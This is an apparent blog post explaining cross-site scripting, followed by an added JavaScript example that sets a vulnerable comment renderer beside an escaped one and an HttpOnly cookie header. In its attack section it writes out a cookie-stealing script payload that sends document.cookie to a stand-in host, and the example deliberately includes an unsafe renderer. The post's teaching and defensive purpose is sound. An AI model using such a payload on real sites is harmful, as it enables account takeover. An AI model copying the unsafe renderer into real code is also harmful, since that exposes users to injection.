What is Cross Site Scripting (XSS) Attack?

Posted by Sharmin Islam on May 19th, 2019

Attackers have many ways to make you a victim of their malicious activities. Cross Site Scripting (XSS) is a type of attack that injects malicious scripts into an application by exploiting coding vulnerabilities. In XSS attacks, it is mainly the application’s users who are put at risk.

In detail, Cross Site Scripting is a coding vulnerability. An attacker injects malicious scripts into a web page’s HTML or source code.

How is it performed?

A web page is vulnerable to XSS if user input is not validated and the HTML tags in it are not escaped properly. The attack is performed in a few steps.

For example, suppose you’re making a comment on your friend’s Facebook picture. As soon as you make the comment, the web page is updated and your comment becomes visible under your friend’s picture. The HTML of the web page must be updated to include this comment. The change is also saved on the web server, because the comment should be visible to everyone who looks at your friend’s picture. So the Facebook web server will naturally save the changes to the HTML of that web page permanently. This feature can of course be misused if the website is vulnerable to XSS attack.

Comments containing HTML tags such as <i></i>, <script></script> and so on can pose a security threat. As long as the attacker only uses HTML tags to style a comment, this is not a security issue, but once he turns to the script tag, things get worse. The script tag in HTML is used to include JavaScript in web pages. JavaScript runs in the browser, which means your browser will execute everything written in it. So the hacker can use XSS to inject malicious JavaScript into the website’s HTML and do many devastating things.

Worst of all, the hacker can steal users’ cookies by injecting malicious JavaScript code like this: <script>window.location="http://hackcookie.com/cookiestealer.php?cookie=" + document.cookie;</script>, which sends the cookies to the hacker’s database. So, if the hacker has your cookies, he will be able to log in to your accounts without entering a password.

How can it be prevented?

In XSS, an attacker gains unauthorized access to your website by hacking it anonymously, stealing browser cookies and clipboard contents and controlling it remotely. These malicious activities can be prevented in several ways.

The following suggestions will help keep your users safe from XSS attacks:

Input Sanitization - A site with an input such as a search field that lacks proper input sanitizing is exposed. It needs to sanitize user input to catch potentially malicious user-provided input.

XSS HTML Filter - an XSS filter for Java used to sanitize user input properly against malicious HTML code injection.

Xssprotect - an open source library for preventing Cross Site Scripting attacks that gives developers a way of removing all XSS attack potentialities.

HTML Purifier - an HTML filtering library written in PHP, used to remove malicious code from the input and available as a plug-in for most PHP frameworks.

Use web vulnerability scanning tools - To identify XSS vulnerabilities in your software, you can use web vulnerability scanning tools such as Scan My Server, SiteGuarding, Detectify, SUCURI and more.
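
The comment scenario described earlier, shown as a vulnerable renderer beside a hardened one. This is an added example, not code from the original article or from any library named above; it escapes at output time as a complement to input sanitization, and every function name and sample comment in it is constructed for illustration.

```javascript
// Added example: all names and sample data are constructed for illustration.

// Escape the five characters that let text break out of HTML element
// content or a quoted attribute value.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: the stored comment is pasted into the page as markup,
// so any tag in it becomes part of the page for every viewer.
function renderCommentUnsafe(author, comment) {
  return '<li><b>' + author + '</b>: ' + comment + '</li>';
}

// Hardened: author and comment are escaped at output time, so the browser
// displays them as text and never parses them as tags.
function renderCommentSafe(author, comment) {
  return '<li><b>' + escapeHtml(author) + '</b>: ' + escapeHtml(comment) + '</li>';
}

// Defence in depth against cookie theft: HttpOnly hides the session cookie
// from document.cookie; Secure and SameSite limit where it is sent.
function sessionCookieHeader(name, value) {
  return name + '=' + encodeURIComponent(value) + '; Path=/; HttpOnly; Secure; SameSite=Lax';
}

// Constructed sample comments: one harmless, one carrying a script tag.
const comments = [
  { author: 'alice', text: 'Nice picture! 5 > 4 & counting' },
  { author: 'mallory', text: '<script>/* injected code would run here */</script>' },
];

function renderPage(render) {
  return '<ul>' + comments.map((c) => render(c.author, c.text)).join('') + '</ul>';
}

console.log(renderPage(renderCommentUnsafe)); // script tag survives as markup
console.log(renderPage(renderCommentSafe));   // script tag is shown as plain text
console.log('Set-Cookie: ' + sessionCookieHeader('sid', 'constructed-session-id'));
```

Escaping must match the place the value lands: this helper covers element content and quoted attributes, not values placed inside a script block or a URL.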

Cross Site Scripting is one of the critical website vulnerabilities, and it harms users in many ways. By exploiting the coding vulnerability, hackers steal users’ cookies and spread malware through malicious redirection. The vulnerability is easy to find and prevent if you follow the methods an attacker usually uses.
